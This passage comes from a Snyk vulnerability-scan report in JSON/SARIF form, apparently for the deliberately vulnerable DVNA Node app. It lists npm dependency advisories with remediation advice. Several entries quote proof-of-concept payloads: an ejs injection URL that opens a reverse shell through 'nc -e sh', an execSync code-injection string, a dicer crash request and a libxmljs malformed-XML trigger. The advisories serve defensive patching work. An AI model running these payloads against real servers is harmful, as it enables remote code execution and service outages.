manipulated:\n\n|Type|Origin|Description|\n|--|--|--|\n|**Stored**|Server|The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.|\n|**Reflected**|Server|The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.| \n|**DOM-based**|Client|The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.|\n|**Mutated**| |The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.|\n\n## Affected environments\nThe following environments are susceptible to an XSS attack:\n\n* Web servers\n* Application servers\n* Web application environments\n\n## How to prevent\nThis section describes the top best practices designed to specifically protect your code: \n\n* Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches. \n* Convert special characters such as `?`, `&`, `/`, `<`, `>` and spaces to their respective HTML or URL encoded equivalents. \n* Give users the option to disable client-side scripts.\n* Redirect invalid requests.\n* Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.\n* Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.\n* Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.\n\n# Remediation\nUpgrade `cookie` to version 0.7.0 or higher.\n# References\n- [GitHub Commit](https://github.com/jshttp/cookie/commit/e10042845354fea83bd8f34af72475eed1dadf5c)\n- [GitHub PR](https://github.com/jshttp/cookie/pull/167)\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2316549)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-79", + "npm" + ], + "cvssv3_baseScore": 6.3, + "security-severity": "6.3" + } + }, + { + "id": "SNYK-JS-DICER-2311764", + "shortDescription": { + "text": "High severity - Denial of Service (DoS) vulnerability in dicer" + }, + "fullDescription": { + "text": "(CVE-2022-24434) dicer@0.2.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: dicer\n* Introduced through: dvna@0.0.1, express-fileupload@0.4.0 and others\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › express-fileupload@0.4.0 › busboy@0.2.14 › dicer@0.2.5\n# Overview\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). A malicious attacker can send a modified form to server, and crash the nodejs service. An attacker could sent the payload again and again so that the service continuously crashes.\n# PoC\nawait fetch('http://127.0.0.1:8000', {\r\n method: 'POST',\r\n headers: {\r\n ['content-type']: 'multipart/form-data; boundary=----WebKitFormBoundaryoo6vortfDzBsDiro',\r\n ['content-length']: '145',\r\n connection: 'keep-alive',\r\n },\r\n body: '------WebKitFormBoundaryoo6vortfDzBsDiro\\r\\n Content-Disposition: form-data; name=\"bildbeschreibung\"\\r\\n\\r\\n\\r\\n------WebKitFormBoundaryoo6vortfDzBsDiro--'\r\n });\n# Remediation\nThere is no fixed version for `dicer`.\n\n# References\n- [GitHub Commit](https://github.com/mscdex/dicer/pull/22/commits/b7fca2e93e8e9d4439d8acc5c02f5e54a0112dac)\n- [GitHub Issue](https://github.com/mscdex/busboy/issues/250)\n- [GitHub PR](https://github.com/mscdex/dicer/pull/22)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-400", + "npm" + ], + "cvssv3_baseScore": 7.5, + "security-severity": "7.5" + } + }, + { + "id": "SNYK-JS-EJS-1049328", + "shortDescription": { + "text": "Medium severity - Arbitrary Code Injection vulnerability in ejs" + }, + "fullDescription": { + "text": "ejs@2.7.4" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: ejs\n* Introduced through: dvna@0.0.1 and ejs@2.7.4\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › ejs@2.7.4\n# Overview\n[ejs](https://www.npmjs.com/package/ejs) is a popular JavaScript templating engine.\n\nAffected versions of this package are vulnerable to Arbitrary Code Injection via the `render` and `renderFile`. If external input is flowing into the `options` parameter, an attacker is able run arbitrary code. This include the `filename`, `compileDebug`, and `client` option.\r\n\r\n# POC\r\n```\r\nlet ejs = require('ejs')\r\nejs.render('./views/test.ejs',{\r\n filename:'/etc/passwd\\nfinally { this.global.process.mainModule.require(\\'child_process\\').execSync(\\'touch EJS_HACKED\\') }',\r\n compileDebug: true,\r\n message: 'test',\r\n client: true\r\n})\r\n```\n# Remediation\nUpgrade `ejs` to version 3.1.6 or higher.\n# References\n- [GitHub Commit](https://github.com/mde/ejs/commit/abaee2be937236b1b8da9a1f55096c17dda905fd)\n- [GitHub Issue](https://github.com/mde/ejs/issues/571)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-94", + "npm" + ], + "cvssv3_baseScore": 4.1, + "security-severity": "4.1" + } + }, + { + "id": "SNYK-JS-EJS-2803307", + "shortDescription": { + "text": "High severity - Remote Code Execution (RCE) vulnerability in ejs" + }, + "fullDescription": { + "text": "(CVE-2022-29078) ejs@2.7.4" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: ejs\n* Introduced through: dvna@0.0.1 and ejs@2.7.4\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › ejs@2.7.4\n# Overview\n[ejs](https://www.npmjs.com/package/ejs) is a popular JavaScript templating engine.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) by passing an unrestricted render option via the `view options` parameter of `renderFile`, which makes it possible to inject code into `outputFunctionName`.\r\n\r\n\r\n**Note:**\r\nThis vulnerability is exploitable only if the server is already vulnerable to Prototype Pollution.\r\n\r\n# PoC:\r\nCreation of reverse shell:\r\n```\r\nhttp://localhost:3000/page?id=2&settings[view options][outputFunctionName]=x;process.mainModule.require('child_process').execSync('nc -e sh 127.0.0.1 1337');s\r\n```\n# Remediation\nUpgrade `ejs` to version 3.1.7 or higher.\n# References\n- [GitHub Commit](https://github.com/mde/ejs/commit/15ee698583c98dadc456639d6245580d17a24baf)\n- [GitHub Issue](https://github.com/mde/ejs/issues/451)\n- [GitHub Release](https://github.com/mde/ejs/releases)\n- [Security Advisory](https://eslam.io/posts/ejs-server-side-template-injection-rce/)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-29078.yaml)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-94", + "npm" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JS-EJS-6689533", + "shortDescription": { + "text": "Medium severity - Improper Control of Dynamically-Managed Code Resources vulnerability in ejs" + }, + "fullDescription": { + "text": "(CVE-2024-33883) ejs@2.7.4" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: ejs\n* Introduced through: dvna@0.0.1 and ejs@2.7.4\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › ejs@2.7.4\n# Overview\n[ejs](https://www.npmjs.com/package/ejs) is a popular JavaScript templating engine.\n\nAffected versions of this package are vulnerable to Improper Control of Dynamically-Managed Code Resources due to the lack of certain pollution protection mechanisms. An attacker can exploit this vulnerability to manipulate object properties that should not be accessible or modifiable.\r\n\r\n**Note:**\r\n\r\nEven after updating to the fix version that adds enhanced protection against prototype pollution, it is still possible to override the `hasOwnProperty` method.\n# Remediation\nUpgrade `ejs` to version 3.1.10 or higher.\n# References\n- [GitHub Commit](https://github.com/mde/ejs/commit/e469741dca7df2eb400199e1cdb74621e3f89aa5)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-915", + "npm" + ], + "cvssv3_baseScore": 5.3, + "security-severity": "5.3" + } + }, + { + "id": "SNYK-JS-EXPRESSFILEUPLOAD-2635697", + "shortDescription": { + "text": "Medium severity - Arbitrary File Upload vulnerability in express-fileupload" + }, + "fullDescription": { + "text": "(CVE-2022-27140) express-fileupload@0.4.0" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: express-fileupload\n* Introduced through: dvna@0.0.1 and express-fileupload@0.4.0\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › express-fileupload@0.4.0\n# Overview\n[express-fileupload](https://github.com/richardgirges/express-fileupload) is a file upload middleware for express that wraps around busboy.\n\nAffected versions of this package are vulnerable to Arbitrary File Upload that allows attackers to execute arbitrary code when uploading a crafted PHP file.\r\n\r\n**NOTE:** The maintainers of this package dispute its validity on the grounds that the attack vector described is the normal usage of the package.\n# Remediation\nThere is no fixed version for `express-fileupload`.\n\n# References\n- [GitHub Issue](https://github.com/richardgirges/express-fileupload/issues/312)\n- [GitHub Issue](https://github.com/richardgirges/express-fileupload/issues/316)\n- [PoC](https://www.youtube.com/watch?v=4XpofFi84KI)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-434", + "npm" + ], + "cvssv3_baseScore": 5.3, + "security-severity": "5.3" + } + }, + { + "id": "SNYK-JS-EXPRESSFILEUPLOAD-2635946", + "shortDescription": { + "text": "Medium severity - Arbitrary File Upload vulnerability in express-fileupload" + }, + "fullDescription": { + "text": "(CVE-2022-27261) express-fileupload@0.4.0" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: express-fileupload\n* Introduced through: dvna@0.0.1 and express-fileupload@0.4.0\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › express-fileupload@0.4.0\n# Overview\n[express-fileupload](https://github.com/richardgirges/express-fileupload) is a file upload middleware for express that wraps around busboy.\n\nAffected versions of this package are vulnerable to Arbitrary File Upload when it is possible for attackers to upload multiple files with the same name, causing an overwrite of files in the web application server.\n# Remediation\nThere is no fixed version for `express-fileupload`.\n\n# References\n- [GitHub Issue](https://github.com/richardgirges/express-fileupload/issues/312)\n- [GitHub Issue](https://github.com/richardgirges/express-fileupload/issues/316)\n- [PoC](https://www.youtube.com/watch?v=3ROHB3ck4tA)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-434", + "npm" + ], + "cvssv3_baseScore": 5.3, + "security-severity": "5.3" + } + }, + { + "id": "SNYK-JS-EXPRESSFILEUPLOAD-473997", + "shortDescription": { + "text": "High severity - Denial of Service (DoS) vulnerability in express-fileupload" + }, + "fullDescription": { + "text": "express-fileupload@0.4.0" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: express-fileupload\n* Introduced through: dvna@0.0.1 and express-fileupload@0.4.0\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › express-fileupload@0.4.0\n# Overview\n[express-fileupload](https://github.com/richardgirges/express-fileupload) is a file upload middleware for express that wraps around busboy.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). The package does not limit file name length.\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `express-fileupload` to version 1.1.6-alpha.6 or higher.\n# References\n- [GitHub PR](https://github.com/richardgirges/express-fileupload/pull/171)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-400", + "npm" + ], + "cvssv3_baseScore": 7.5, + "security-severity": "7.5" + } + }, + { + "id": "SNYK-JS-EXPRESSFILEUPLOAD-595969", + "shortDescription": { + "text": "High severity - Prototype Pollution vulnerability in express-fileupload" + }, + "fullDescription": { + "text": "(CVE-2020-7699) express-fileupload@0.4.0" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: express-fileupload\n* Introduced through: dvna@0.0.1 and express-fileupload@0.4.0\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › express-fileupload@0.4.0\n# Overview\n[express-fileupload](https://github.com/richardgirges/express-fileupload) is a file upload middleware for express that wraps around busboy.\n\nAffected versions of this package are vulnerable to Prototype Pollution. If the `parseNested` option is enabled, sending a corrupt HTTP request can lead to denial of service or arbitrary code execution.\n\n# Details\n\nPrototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as `__proto__`, `constructor` and `prototype`. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the `Object.prototype` are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.\n\nThere are two main ways in which the pollution of prototypes occurs:\n\n- Unsafe `Object` recursive merge\n \n- Property definition by path\n \n\n## Unsafe Object recursive merge\n\nThe logic of a vulnerable recursive merge function follows the following high-level model:\n```\nmerge (target, source)\n\n foreach property of source\n\n if property exists and is an object on both the target and the source\n\n merge(target[property], source[property])\n\n else\n\n target[property] = source[property]\n```\n
\n\nWhen the source object contains a property named `__proto__` defined with `Object.defineProperty()` , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of `Object` and the source of `Object` as defined by the attacker. Properties are then copied on the `Object` prototype.\n\nClone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: `merge({},source)`.\n\n`lodash` and `Hoek` are examples of libraries susceptible to recursive merge attacks.\n\n## Property definition by path\n\nThere are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: `theFunction(object, path, value)`\n\nIf the attacker can control the value of “pathâ€, they can set this value to `__proto__.myValue`. `myValue` is then assigned to the prototype of the class of the object.\n\n# Types of attacks\n\nThere are a few methods by which Prototype Pollution can be manipulated:\n\n| Type |Origin |Short description |\n|--|--|--|\n| **Denial of service (DoS)**|Client |This is the most likely attack.
DoS occurs when `Object` holds generic functions that are implicitly called for various operations (for example, `toString` and `valueOf`).
The attacker pollutes `Object.prototype.someattr` and alters its state to an unexpected value such as `Int` or `Object`. In this case, the code fails and is likely to cause a denial of service.
**For example:** if an attacker pollutes `Object.prototype.toString` by defining it as an integer, if the codebase at any point was reliant on `someobject.toString()` it would fail. |\n |**Remote Code Execution**|Client|Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
**For example:** `eval(someobject.someattr)`. In this case, if the attacker pollutes `Object.prototype.someattr` they are likely to be able to leverage this in order to execute code.|\n|**Property Injection**|Client|The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
**For example:** if a codebase checks privileges for `someuser.isAdmin`, then when the attacker pollutes `Object.prototype.isAdmin` and sets it to equal `true`, they can then achieve admin privileges.|\n\n# Affected environments\n\nThe following environments are susceptible to a Prototype Pollution attack:\n\n- Application server\n \n- Web server\n\n- Web browser\n \n\n# How to prevent\n\n1. Freeze the prototype— use `Object.freeze (Object.prototype)`.\n \n2. Require schema validation of JSON input.\n \n3. Avoid using unsafe recursive merge functions.\n \n4. Consider using objects without prototypes (for example, `Object.create(null)`), breaking the prototype chain and preventing pollution.\n \n5. As a best practice use `Map` instead of `Object`.\n\n## For more information on this vulnerability type:\n\n[Arteau, Oliver. “JavaScript prototype pollution attack in NodeJS application.†GitHub, 26 May 2018](https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf)\n\n# Remediation\nUpgrade `express-fileupload` to version 1.1.10 or higher.\n# References\n- [GitHub Issue](https://github.com/richardgirges/express-fileupload/issues/236)\n- [GitHub PR](https://github.com/richardgirges/express-fileupload/commit/9fca550f08a9dc07cc3500921f4fa7879cf88b8f)\n- [POSIX Vulnerability Blog](https://blog.p6.is/Real-World-JS-1/)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-1321", + "npm" + ], + "cvssv3_baseScore": 7.5, + "security-severity": "7.5" + } + }, + { + "id": "SNYK-JS-INFLIGHT-6095116", + "shortDescription": { + "text": "Medium severity - Missing Release of Resource after Effective Lifetime vulnerability in inflight" + }, + "fullDescription": { + "text": "inflight@1.0.6" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: inflight\n* Introduced through: dvna@0.0.1, bcrypt@1.0.3 and others\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › bcrypt@1.0.3 › node-pre-gyp@0.6.36 › rimraf@2.7.1 › glob@7.2.3 › inflight@1.0.6\n* _Introduced through_: dvna@0.0.1 › libxmljs@0.19.10 › @mapbox/node-pre-gyp@1.0.11 › rimraf@3.0.2 › glob@7.2.3 › inflight@1.0.6\n# Overview\n\nAffected versions of this package are vulnerable to Missing Release of Resource after Effective Lifetime via the `makeres` function due to improperly deleting keys from the `reqs` object after execution of callbacks. This behavior causes the keys to remain in the `reqs` object, which leads to resource exhaustion.\r\n\r\nExploiting this vulnerability results in crashing the `node` process or in the application crash.\r\n\r\n**Note:**\r\nThis library is not maintained, and currently, there is no fix for this issue. To overcome this vulnerability, several dependent packages have eliminated the use of this library.\r\n\r\nTo trigger the memory leak, an attacker would need to have the ability to execute or influence the asynchronous operations that use the inflight module within the application. This typically requires access to the internal workings of the server or application, which is not commonly exposed to remote users. Therefore, “Attack vector†is marked as “Localâ€.\n# PoC\n```js\r\nconst inflight = require('inflight');\r\n\r\nfunction testInflight() {\r\n let i = 0;\r\n function scheduleNext() {\r\n let key = `key-${i++}`;\r\n const callback = () => {\r\n };\r\n for (let j = 0; j < 1000000; j++) {\r\n inflight(key, callback);\r\n }\r\n\r\n setImmediate(scheduleNext);\r\n }\r\n\r\n\r\n if (i % 100 === 0) {\r\n console.log(process.memoryUsage());\r\n }\r\n\r\n scheduleNext();\r\n}\r\n\r\ntestInflight();\r\n```\n# Remediation\nThere is no fixed version for `inflight`.\n\n# References\n- [GitHub Issue](https://github.com/isaacs/inflight/issues/5)\n- [GitHub PR](https://github.com/logdna/logdna-agent/pull/157)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-772", + "npm" + ], + "cvssv3_baseScore": 6.2, + "security-severity": "6.2" + } + }, + { + "id": "SNYK-JS-LIBXMLJS-6091649", + "shortDescription": { + "text": "High severity - Remote Code Execution (RCE) vulnerability in libxmljs" + }, + "fullDescription": { + "text": "(CVE-2024-34391) libxmljs@0.19.10" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: libxmljs\n* Introduced through: dvna@0.0.1 and libxmljs@0.19.10\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › libxmljs@0.19.10\n# Overview\n[libxmljs](https://github.com/libxmljs/libxmljs) is a libxml bindings for v8 javascript engine\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) when parsing a specially crafted XML while invoking a function on the result of `attrs()` that was called on a parsed node. An attacker can cause denial of service, data leak, infinite loop, and execute arbitrary code on 32-bit systems with the `XML_PARSE_HUGE` flag enabled by submitting a malicious XML document.\n# PoC\n```js\r\n\r\nconst libxmljs = require('libxmljs');\r\n\r\nvar d = `\r\n\r\n]>\r\n&writer;\r\n`;\r\n\r\nt = libxmljs.parseXml(d, {flags: [libxmljs.XMLParseFlags.XML_PARSE_HUGE]})\r\nfrom = t.get('//from')\r\nc = from.childNodes()[0]\r\nc2 = c.childNodes()[0]\r\nc2_attrs = c2.attrs()\r\n```\n# Remediation\nThere is no fixed version for `libxmljs`.\n\n# References\n- [GitHub Issue](https://github.com/libxmljs/libxmljs/issues/645)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-94", + "npm" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JS-LIBXMLJS-6807576", + "shortDescription": { + "text": "High severity - Type Confusion vulnerability in libxmljs" + }, + "fullDescription": { + "text": "(CVE-2024-34392) libxmljs@0.19.10" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: libxmljs\n* Introduced through: dvna@0.0.1 and libxmljs@0.19.10\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › libxmljs@0.19.10\n# Overview\n[libxmljs](https://github.com/libxmljs/libxmljs) is a libxml bindings for v8 javascript engine\n\nAffected versions of this package are vulnerable to Type Confusion when parsing a specially crafted XML while invoking the namespaces() function, which invokes `_wrap__xmlNode_nsDef_get()` function on a grand-child of a node that refers to an entity. An attacker can cause a denial of service or execute arbitrary code by parsing a specially crafted XML document.\n# PoC\n```js\n\nconst libxmljs = require('libxmljs');\n\nvar d = `\n\n]>\n&writer;\n`;\n\nt = libxmljs.parseXml(d)\nfrom = t.get('//from')\nc = from.childNodes()[0]\nc2 = c.childNodes()[0] //entity_decl\nn = c2.namespaces(true) //onlyLocal = true\n```\n# Remediation\nThere is no fixed version for `libxmljs`.\n\n# References\n- [GitHub Issue](https://github.com/libxmljs/libxmljs/issues/646)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-843", + "npm" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JS-MATHJS-1016401", + "shortDescription": { + "text": "High severity - Prototype Pollution vulnerability in mathjs" + }, + "fullDescription": { + "text": "(CVE-2020-7743) mathjs@3.10.1" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: mathjs\n* Introduced through: dvna@0.0.1 and mathjs@3.10.1\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › mathjs@3.10.1\n# Overview\n[mathjs](https://github.com/josdejong/mathjs) is a math library for JavaScript and Node.js. It features a flexible expression parser with support for symbolic computation, comes with a large set of built-in functions and constants, and offers an integrated solution to work with diff.\n\nAffected versions of this package are vulnerable to Prototype Pollution via the `deepExtend function` that runs upon configuration updates.\n\n# Details\n\nPrototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as `__proto__`, `constructor` and `prototype`. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the `Object.prototype` are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.\n\nThere are two main ways in which the pollution of prototypes occurs:\n\n- Unsafe `Object` recursive merge\n \n- Property definition by path\n \n\n## Unsafe Object recursive merge\n\nThe logic of a vulnerable recursive merge function follows the following high-level model:\n```\nmerge (target, source)\n\n foreach property of source\n\n if property exists and is an object on both the target and the source\n\n merge(target[property], source[property])\n\n else\n\n target[property] = source[property]\n```\n
\n\nWhen the source object contains a property named `__proto__` defined with `Object.defineProperty()` , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of `Object` and the source of `Object` as defined by the attacker. Properties are then copied on the `Object` prototype.\n\nClone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: `merge({},source)`.\n\n`lodash` and `Hoek` are examples of libraries susceptible to recursive merge attacks.\n\n## Property definition by path\n\nThere are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: `theFunction(object, path, value)`\n\nIf the attacker can control the value of “pathâ€, they can set this value to `__proto__.myValue`. `myValue` is then assigned to the prototype of the class of the object.\n\n# Types of attacks\n\nThere are a few methods by which Prototype Pollution can be manipulated:\n\n| Type |Origin |Short description |\n|--|--|--|\n| **Denial of service (DoS)**|Client |This is the most likely attack.
DoS occurs when `Object` holds generic functions that are implicitly called for various operations (for example, `toString` and `valueOf`).
The attacker pollutes `Object.prototype.someattr` and alters its state to an unexpected value such as `Int` or `Object`. In this case, the code fails and is likely to cause a denial of service.
**For example:** if an attacker pollutes `Object.prototype.toString` by defining it as an integer, if the codebase at any point was reliant on `someobject.toString()` it would fail. |\n |**Remote Code Execution**|Client|Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
**For example:** `eval(someobject.someattr)`. In this case, if the attacker pollutes `Object.prototype.someattr` they are likely to be able to leverage this in order to execute code.|\n|**Property Injection**|Client|The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
**For example:** if a codebase checks privileges for `someuser.isAdmin`, then when the attacker pollutes `Object.prototype.isAdmin` and sets it to equal `true`, they can then achieve admin privileges.|\n\n# Affected environments\n\nThe following environments are susceptible to a Prototype Pollution attack:\n\n- Application server\n \n- Web server\n\n- Web browser\n \n\n# How to prevent\n\n1. Freeze the prototype— use `Object.freeze (Object.prototype)`.\n \n2. Require schema validation of JSON input.\n \n3. Avoid using unsafe recursive merge functions.\n \n4. Consider using objects without prototypes (for example, `Object.create(null)`), breaking the prototype chain and preventing pollution.\n \n5. As a best practice use `Map` instead of `Object`.\n\n## For more information on this vulnerability type:\n\n[Arteau, Oliver. “JavaScript prototype pollution attack in NodeJS application.†GitHub, 26 May 2018](https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf)\n\n# Remediation\nUpgrade `mathjs` to version 7.5.1 or higher.\n# References\n- [GitHub Additional Information](https://github.com/josdejong/mathjs/blob/develop/src/utils/object.js#L82)\n- [GitHub Commit](https://github.com/josdejong/mathjs/commit/ecb80514e80bce4e6ec7e71db8ff79954f07c57e)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-1321", + "npm" + ], + "cvssv3_baseScore": 7.3, + "security-severity": "7.3" + } + }, + { + "id": "npm:mathjs:20170331", + "shortDescription": { + "text": "High severity - Arbitrary Code Execution vulnerability in mathjs" + }, + "fullDescription": { + "text": "mathjs@3.10.1" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: mathjs\n* Introduced through: dvna@0.0.1 and mathjs@3.10.1\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › mathjs@3.10.1\n# Overview\n[`mathjs`](https://www.npmjs.com/package/mathjs) is an extensive math library for JavaScript and Node.js.\n\nAffected versions of the package are vulnerable to Arbitrary Code Execution.\n\nThe expression parser in mathjs uses the `eval` and the `new Function` methods insecurely which could allow an attacker to execute arbitrary code on the remote server.\n\n# Remediation\nUpgrade `mathjs` to version 3.10.3 or higher.\n\n# References\n- [GitHub Commit](https://github.com/josdejong/mathjs/compare/v3.10.1...v3.10.3)\n- [GitHub Changelog](https://github.com/josdejong/mathjs/blob/v3.11.5/HISTORY.md#2017-03-31-version-3103)" + }, + "properties": { + "tags": [ + "security", + "CWE-94", + "npm" + ], + "cvssv3_baseScore": 7.3, + "security-severity": "7.3" + } + }, + { + "id": "npm:mathjs:20170402", + "shortDescription": { + "text": "Medium severity - Arbitrary Code Execution vulnerability in mathjs" + }, + "fullDescription": { + "text": "mathjs@3.10.1" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: mathjs\n* Introduced through: dvna@0.0.1 and mathjs@3.10.1\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › mathjs@3.10.1\n# Overview\n[`mathjs`](https://www.npmjs.com/package/mathjs) is an extensive math library for JavaScript and Node.js.\n\nAffected versions of the package are vulnerable to Arbitrary Code Execution.\n\nThe expression parser in mathjs uses the `eval` and the `new Function` methods insecurely which could allow an attacker to execute arbitrary code on the remote server.\n\nthis is due to an incomplete fix for [npm:mathjs:20170331](https://snyk.io/vuln/npm:mathjs:20170331).\n\n# Remediation\nUpgrade `mathjs` to version 3.11.5 or higher.\n\n# References\n- [GitHub PR #1](https://github.com/josdejong/mathjs/issues/821)\n- [GitHub PR #2](https://github.com/josdejong/mathjs/issues/822)\n- [GitHub Changelog](https://github.com/josdejong/mathjs/blob/master/HISTORY.md#2017-04-08-version-3115)\n- [GitHub Commit](https://github.com/josdejong/mathjs/compare/v3.10.3...v3.11.5)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-94", + "npm" + ], + "cvssv3_baseScore": 5.6, + "security-severity": "5.6" + } + }, + { + "id": "npm:mathjs:20170527", + "shortDescription": { + "text": "Medium severity - Arbitrary Code Execution vulnerability in mathjs" + }, + "fullDescription": { + "text": "mathjs@3.10.1" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: mathjs\n* Introduced through: dvna@0.0.1 and mathjs@3.10.1\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › mathjs@3.10.1\n# Overview\n[`mathjs`](https://www.npmjs.com/package/mathjs) is an extensive math library for JavaScript and Node.js.\n\nAffected versions of the package are vulnerable to Arbitrary Code Execution. The `isSafeMethod` was able to call other methods (like bind) which is not allowed and could cause code execution on the remote server.\n\n# Remediation\nUpgrade `mathjs` to version 3.13.3 or higher.\n\n# References\n- [GitHub Changelog](https://github.com/josdejong/mathjs/blob/master/HISTORY.md#2017-05-27-version-3133)\n- [GitHub Commit](https://github.com/josdejong/mathjs/commit/ed5f2cebaf873ba1e57acbce2a3668686ac69331)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-94", + "npm" + ], + "cvssv3_baseScore": 5.6, + "security-severity": "5.6" + } + }, + { + "id": "npm:mathjs:20171118", + "shortDescription": { + "text": "High severity - Arbitrary Code Execution vulnerability in mathjs" + }, + "fullDescription": { + "text": "(CVE-2017-1001002) mathjs@3.10.1" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: mathjs\n* Introduced through: dvna@0.0.1 and mathjs@3.10.1\n### Detailed 